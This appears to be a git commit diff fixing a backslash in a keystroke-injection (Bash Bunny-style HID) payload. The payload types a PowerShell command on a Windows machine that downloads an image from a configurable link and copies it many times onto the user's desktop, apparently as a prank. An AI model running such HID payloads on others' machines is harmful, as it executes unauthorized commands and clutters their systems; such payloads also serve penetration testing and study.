so it actually works (#486)

I foolishly forgot to add a second backslash to $ImageName
This commit is contained in:
JustaProgrammer9
2022-01-24 14:28:25 -05:00
committed by GitHub
parent f5292aa8ce
commit fab1466896

View File

@@ -35,7 +35,7 @@ ATTACKMODE HID
LED Y
RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\$ImageName\$_.jpg\"}\""
RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\\$ImageName\$_.jpg\"}\""
Q ENTER